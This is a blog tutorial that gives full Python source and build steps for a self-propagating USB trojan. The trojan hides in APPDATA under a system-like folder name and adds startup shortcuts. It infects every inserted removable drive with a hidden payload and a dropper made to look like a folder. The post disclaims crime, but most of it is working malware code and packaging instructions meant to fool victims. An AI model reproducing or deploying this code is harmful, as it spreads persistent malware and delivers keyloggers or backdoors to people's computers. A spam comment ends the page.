Table of Contents
Introduction
A computer Trojan is a type of malicious software that appears to be harmless, but is actually designed to harm or steal data from a computer system. It is one of the most common forms of malware that cybercriminals use to compromise computer security. A Trojan horse can be disguised as a legitimate software or file, such as a game, video or music file, and can be spread through various methods, including email attachments, malicious websites, and social engineering tactics. One particularly insidious form of Trojan horse is the USB Trojan, which is designed to infect computers through USB devices, such as thumb drives or external hard drives. In this blog post, we will explore the dangers of USB Trojans and how you can code one yourself for educational purposes
This idea is inspired by this github post
Disclamer
The consequences of spreading a USB Trojan can be devastating, and can result in legal action and severe penalties. It is important to take computer security seriously and avoid creating or distributing malware of any kind.
I am not supporting any crime in any direction with this blog post, I am just writing this post to demonstrate to you how easy it is to write trojans like this one.
It is for informational purposes only and reprogramming is at your own risk.
How the USB Trojan works
- 1. The Trojan gets installed on the victims computer
- 2. If the pc restarts the Cockroach will run in the background and will look for new usb drives
- 3.The syware will be activated after a reboot. Now (after a restart) every time any USB-Drive is inserted in the affected PC, the virus will copy itself in that, and will also create a hidden folder called data with the payload.exe in it.
- 4. The payload.exe can be everything (Keylogger, Credentials Grabber, Backdoor etc.)
- 5. Now the cycle will start again
If a USB Drive is infected it will look like this. The actual payload is stored in the data folder. If someone opens the ClickMe.exe it will copy itself and the payload into the APPDATA and will add both programms to the startup menu.
How to code the USB Trojan
At first we need to import some methods:
import win32api
import win32con
import win32file
import shutil
import sys
import ctypes
import time
import getpass
import win32com.client
import pythoncom
import osNow we can create a method which checks for new USB Drives:
def get_removable_drives():
drives = [i for i in win32api.GetLogicalDriveStrings().split('\x00') if i]
rdrives = [d for d in drives if win32file.GetDriveType(d) == win32con.DRIVE_REMOVABLE]
return rdrivesAfter this we will need to check if the computer is already infected
If a Pc is already infected it has the folder WindowsRuntime and the file win_logs.txt in the APPDATA Directory, so we have to check if the directory and the file exist. But before we need to take a look if we are running our Cockroach of a USB Drive or if we are running it in the APPDATA Directory after a Pc startup.
For this we create the following function:
isOnUSB = False
def checkIfIsOnUSB():
global isOnUSB
executePath = sys.executable
#executePath = "E:\Cockroach Python\dist\cockroach.exe"
x = executePath.split("\\")
currentDir = x[0]+"\\"
drives = get_removable_drives()
for d in drives:
if(d==currentDir):
isOnUSB=TrueNow we can check if the computer is already infected with our trojan:
#Define the names of the payload and trojan
PAYLOADNAME = "payload.exe"
PAYLOADSRC = "data\\"+PAYLOADNAME
COCKROACHNAME = "ClickMe.exe"
def checkInfection():
global PAYLOADNAME
global COCKROACHNAME
APPDATA = os.getenv('APPDATA') + "\\"
if(isOnUSB):
#Cockroach is on USB
#Check if the file win_log exists in the APPDATA Folder
filePath = APPDATA + "win_log.txt"
if not os.path.isfile(filePath):
#Infect the pc
directory = APPDATA + "WindowsRuntime"
#Create WindowsRuntime Folder
if not os.path.exists(directory):
os.makedirs(directory)
#Paste directory of it into it
#Paste payload and cockroach into it
shutil.copy(PAYLOADSRC, directory)
#Paste cockroach into it
shutil.copy(COCKROACHNAME, directory)
#Write to file for infection
f = open(filePath, "w")
f.write("g")
f.close()
#Add Payload to start and ClickMe also
addToStartUp()
sys.exit("")
else:
#Check for incoming usb sticks
drives = get_removable_drives()
while True:
drives = get_removable_drives()
for d in drives:
if not os.path.exists(d+"\data"):
#infect machine
os.makedirs(d+"\data")
FILE_ATTRIBUTE_HIDDEN = 0x02
ret = ctypes.windll.kernel32.SetFileAttributesW(d+"\data", FILE_ATTRIBUTE_HIDDEN)
#Copy payload into it
src = APPDATA + "WindowsRuntime\\"+PAYLOADNAME
shutil.copy(src, d+"\data")
src = APPDATA + "WindowsRuntime\\"+COCKROACHNAME
shutil.copy(src, d)
time.sleep(10)This function checks if the programm is running of a USB Drive. If so it is checking if the computer is already infected and if not it will paste itself into the APPDATA Directory and will create a new folder called WindowsRuntime there.
If the computer is already infected it will just close itself.
If we are not running the programm of a USB Device, we know that the trojan is already installed and that the programm got started at startup. Now we can check for new USB Devices and can infect them.
It will wait 10 seconds after it checked and infected the USB Devices.
Thats all. Now we just have to add all these pieces of code together and we have a running script which will look like this:
import win32api
import win32con
import win32file
import shutil
import sys
import ctypes
import time
import getpass
import win32com.client
import pythoncom
import os
isOnUSB = False
PAYLOADNAME = "payload.exe"
PAYLOADSRC = "data\\"+PAYLOADNAME
COCKROACHNAME = "ClickMe.exe"
def checkInfection():
global PAYLOADNAME
global COCKROACHNAME
APPDATA = os.getenv('APPDATA') + "\\"
if(isOnUSB):
#Cockroach is on USB
filePath = APPDATA + "win_log.txt"
if not os.path.isfile(filePath):
#Infected the pc
directory = APPDATA + "WindowsRuntime"
#Create WindowsRuntime Folder
if not os.path.exists(directory):
os.makedirs(directory)
#Paste directory of it into it
#Paste payload and cockroach into it
shutil.copy(PAYLOADSRC, directory)
#Paste cockroach into it
shutil.copy(COCKROACHNAME, directory)
#Write to file for infection
f = open(filePath, "w")
f.write("g")
f.close()
#Add Payload to start and ClickMe also
addToStartUp()
sys.exit("")
else:
#Check for incoming usb sticks
drives = get_removable_drives()
while True:
drives = get_removable_drives()
for d in drives:
if not os.path.exists(d+"\data"):
#infect machine
os.makedirs(d+"\data")
FILE_ATTRIBUTE_HIDDEN = 0x02
ret = ctypes.windll.kernel32.SetFileAttributesW(d+"\data", FILE_ATTRIBUTE_HIDDEN)
#Copy payload into it
src = APPDATA + "WindowsRuntime\\"+PAYLOADNAME
shutil.copy(src, d+"\data")
src = APPDATA + "WindowsRuntime\\"+COCKROACHNAME
shutil.copy(src, d)
time.sleep(3)
def addToStartUp():
global PAYLOADNAME
APPDATA = os.getenv('APPDATA')
paySRC = APPDATA+"\\WindowsRuntime\\"+PAYLOADNAME
roachSRC = APPDATA+"\\WindowsRuntime\\"+COCKROACHNAME
startupSource = APPDATA + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
#For Payload.exe
path = os.path.join(startupSource, 'WindowsRuntimeException.lnk')
target = paySRC
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
shortcut.save()
#For ClickMe
path = os.path.join(startupSource, 'WindowsRuntime.lnk')
target = roachSRC
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
shortcut.save()
def get_removable_drives():
drives = [i for i in win32api.GetLogicalDriveStrings().split('\x00') if i]
rdrives = [d for d in drives if win32file.GetDriveType(d) == win32con.DRIVE_REMOVABLE]
return rdrives
def checkIfIsOnUSB():
global isOnUSB
executePath = sys.executable
#executePath = "E:\Cockroach Python\dist\cockroach.exe"
x = executePath.split("\\")
currentDir = x[0]+"\\"
drives = get_removable_drives()
for d in drives:
if(d==currentDir):
isOnUSB=True
if __name__ == "__main__":
checkIfIsOnUSB()
checkInfection()Convert it to exe
In order to convert it into a running programm we will install pyinstaller with the command:
pip install pyinstallerNow we can run:
pyinstaller --onefile --noconsole --icon=icon.ico <name>.pyI wanted to add a folder icon to the exe, so that our victim thinks it is a folder so I downloaded a folder png like this and converted it into a ico file.
You will now find these to folders in your project, but the only important one is the dist folder. Now rename the .exe file like the COCKROACHNAME variable in your python file
Injecting the payload
Now we need to add the actual payload into our Cockroach. For this we create a new folder called data in the dist folder. Now you can move your payload into the data folder (it has to be the same name like the PAYLOADNAME variable in python).
Test it out
Now move the data folder and the ClickMe.exe onto a USB Drive and run the ClickMe.exe file. The pc is now injected and will copy the payload and our USB Cockroach to all incoming USB Devices.
Conclusion
So what are we learning with this project?
USB sticks can be very dangerous and it is very easy to write Trojans like these, which most users do not even notice.
Therefore, always remember not to insert foreign USB sticks into your computer and especially not to open foreign files that you are unsure about.
Also, remember that your antivirus programs do not protect you from all programs like this one, and always be careful what you run on your PC.
If you are interested in more coding tutorials check out our coding category of our blog.
Hi there it’s mе, I am also visiting this web page daily, this web page is reаlly nice and the vіsitors are really sharing nice
thoughts.